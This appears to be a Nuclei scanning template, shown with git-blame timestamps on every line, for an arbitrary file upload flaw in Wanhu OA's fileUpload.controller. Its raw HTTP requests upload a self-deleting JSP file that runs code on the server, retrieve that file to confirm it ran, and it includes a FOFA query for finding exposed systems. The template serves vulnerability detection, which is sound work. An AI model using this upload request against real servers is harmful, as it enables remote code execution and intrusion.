2023-09-08 11:25:00 +00:00
|
|
|
id: wanhu-oa-fileupload-controller
|
|
|
|
|
2023-08-18 03:22:06 +00:00
|
|
|
info:
|
2023-09-08 11:25:00 +00:00
|
|
|
name: Wanhu OA Fileupload Controller - Arbitrary File Upload
|
2023-08-18 03:22:06 +00:00
|
|
|
author: SleepingBag945
|
|
|
|
severity: critical
|
2023-09-08 11:25:00 +00:00
|
|
|
description: |
|
|
|
|
There is an arbitrary file upload vulnerability in Wanhu OA fileUpload.controller. An attacker can upload any file through the vulnerability.
|
2023-08-18 03:22:06 +00:00
|
|
|
reference:
|
2023-09-08 11:25:00 +00:00
|
|
|
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/oa/%E4%B8%87%E6%88%B7OA/%E4%B8%87%E6%88%B7OA%20fileUpload.controller%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md?plain=1#L24
|
|
|
|
- https://github.com/tr0uble-mAker/POC-bomber/blob/d2433ac41eaa58eb4fb0876ec05e3b645e10ecd7/pocs/redteam/wanhu_oa_fileupload-controller_fileupload_2022.py#L20
|
|
|
|
metadata:
|
|
|
|
verified: true
|
2023-10-14 11:27:55 +00:00
|
|
|
max-request: 2
|
2023-09-08 11:25:00 +00:00
|
|
|
fofa-query: app="万户网络-ezOFFICE"
|
2023-10-14 11:27:55 +00:00
|
|
|
tags: wanhu,oa,fileupload,controller,intrusive
|
2023-09-08 11:25:00 +00:00
|
|
|
variables:
|
|
|
|
num1: "{{rand_int(1000, 9999)}}"
|
|
|
|
num2: "{{rand_int(1000, 9999)}}"
|
|
|
|
result: "{{to_number(num1)*to_number(num2)}}"
|
2023-08-18 03:22:06 +00:00
|
|
|
|
|
|
|
http:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /defaultroot/upload/fileUpload.controller HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed
|
|
|
|
Cookie: OASESSIONID=416B4CE965CD27DEED8197A8528A33E6
|
|
|
|
|
|
|
|
--b0d829daa06c13d6b3e16b0ad21d1eed
|
2023-09-08 11:25:00 +00:00
|
|
|
Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp"
|
2023-08-18 03:22:06 +00:00
|
|
|
Content-Type: application/octet-stream
|
|
|
|
|
2023-09-08 11:25:00 +00:00
|
|
|
<%out.print({{num1}}*{{num2}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
|
2023-08-18 03:22:06 +00:00
|
|
|
--b0d829daa06c13d6b3e16b0ad21d1eed--
|
|
|
|
- |
|
|
|
|
GET /defaultroot/upload/html/{{filename}} HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
2023-09-08 11:25:00 +00:00
|
|
|
matchers:
|
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- 'status_code_1 == 200 && contains(body_1, "\"result\":\"success\"") && contains(body_1,"fileSize")'
|
|
|
|
- 'status_code_2 == 200 && contains(body_2,"{{result}}")'
|
|
|
|
condition: and
|
2023-08-18 03:22:06 +00:00
|
|
|
|
|
|
|
extractors:
|
|
|
|
- type: regex
|
|
|
|
name: filename
|
|
|
|
group: 1
|
|
|
|
regex:
|
|
|
|
- '"data":"(.*?)"'
|
2023-10-14 11:27:55 +00:00
|
|
|
internal: true
|
2023-10-19 13:13:52 +00:00
|
|
|
# digest: 4a0a004730450220285126b729ccfd09f0e766a08c863930f1745d4071db7394de32056e9ff8dbf4022100f804bdbc219b632b22c97298af1e2d8eddf3c193532ce219e906096c2ff25f2b:922c64590222798bb761d5b6d8e72950
|